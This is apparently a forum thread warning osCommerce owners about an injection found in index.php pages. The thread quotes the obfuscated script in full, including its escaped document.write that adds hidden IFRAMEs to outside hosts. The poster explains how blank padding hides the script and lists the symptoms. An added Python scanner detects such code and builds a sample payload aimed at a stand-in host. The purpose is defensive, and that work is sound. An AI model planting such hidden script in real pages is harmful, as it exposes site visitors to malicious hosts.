osCommerce

osCommerce IFRAME html injection Exploit


bluetrope


One of my osCommerce sites was recently hacked. It's sneaky: a bit of escaped javascript is inserted at the end of (seemingly) all index.php pages in an osCommerce installation. The code is preceded by > 80 blanks, so it is not readily visible when editing without wordwrap. Here's the code:


<script language=javascript>function func(){if (window.status != " ") { window.status = " "; }} stop = window.setInterval("func()",7);</script><script language=javascript>document.write(unescape('%3c%49%46%52%41%4d%45%20%53%52%43%3d%22%68%74%74%70%3a%2f%2f%63%72%75%6e%65%74%2e%69%6e%66%6f%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%57%49%44%54%48%3d%30%20%42%4f%52%44%45%52%3d%30%20%48%45%49%47%48%54%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%49%46%52%41%4d%45%3e%3c%49%46%52%41%4d%45%20%53%52%43%3d%22%68%74%74%70%3a%2f%2f%6f%6e%6c%69%6e%65%70%72%6f%78%69%65%73%2e%63%6f%6d%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%57%49%44%54%48%3d%30%20%42%4f%52%44%45%52%3d%30%20%48%45%49%47%48%54%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%49%46%52%41%4d%45%3e'));</script>


Unescaped, you have a document.write of:


<IFRAME SRC="http://crunet.info/out.php?s_id=1" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>

<IFRAME SRC="http://onlineproxies.com/out.php?s_id=1" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>


which is doing god knows what on these servers (in Moscow and UK respectively).


Beware!


Symptoms are cookies originating from crunet.info and onlineproxies.com, and with certain versions of IE6 execution results in a redirect to http:/// and a 404.


-RN Snead

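As an added example that is not part of the original thread, here is a small Python scanner a site owner could run over an osCommerce tree to spot this kind of injection: it finds document.write(unescape('...')) calls, decodes the percent-escaped payload the way JavaScript's unescape() does, lists any IFRAME sources it contains, and reports the longest run of blanks in front of the call, which is the padding used to push the script out of view. The sample index.php content and the malicious.example hostname are constructed for the demonstration.

```python
import os
import re

# document.write(unescape('...')) with the percent-encoded payload captured.
UNESCAPE_RE = re.compile(r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(?P<enc>[^'\"]*)\1\s*\)\s*\)", re.I)
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
HIDDEN_RE = re.compile(r"display\s*:\s*none|\b(?:width|height)\s*=\s*[\"']?0\b", re.I)


def js_unescape(s):
    """Decode like JavaScript unescape(): %uXXXX code units first, then %XX bytes."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def scan_text(text, min_pad=80):
    """One finding per unescape() call; blank_run is the padding used to hide it."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in UNESCAPE_RE.finditer(line):
            runs = re.findall(r"[ \t]+", line[: m.start()])
            blank_run = max((len(r) for r in runs), default=0)
            decoded = js_unescape(m.group("enc"))
            findings.append({"line": lineno, "blank_run": blank_run, "padded": blank_run >= min_pad,
                             "iframe_srcs": IFRAME_SRC_RE.findall(decoded),
                             "hidden": bool(HIDDEN_RE.search(decoded)), "decoded": decoded})
    return findings


def scan_tree(root):
    """Scan every index.php under root; returns {path: findings} for files with hits."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        if "index.php" in files:
            path = os.path.join(dirpath, "index.php")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_text(fh.read())
            if found:
                hits[path] = found
    return hits


# Constructed sample (not from the thread): injected script appended after 90 blanks.
_PAYLOAD = ('<IFRAME SRC="http://malicious.example/out.php?s_id=1" WIDTH=0 '
            'BORDER=0 HEIGHT=0 style="display:none"></IFRAME>')
_ENCODED = "".join("%%%02x" % ord(c) for c in _PAYLOAD)
SAMPLE_INDEX_PHP = ("<?php\n  require('includes/application_top.php');\n?>\n</body></html>"
                    + " " * 90 + "<script language=javascript>document.write(unescape('"
                    + _ENCODED + "'));</script>\n")
```

Running scan_tree() against the document root of a live store lists each index.php with a hit and the decoded payload, which is the quickest way to confirm whether a site shows the symptoms described above.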

Thank you for warning everyone.


Did you install the newest security release that came out about a week or two weeks ago? I don't know if that release addresses this problem or not, but thought I'd mention it.


Thanks for the warning...
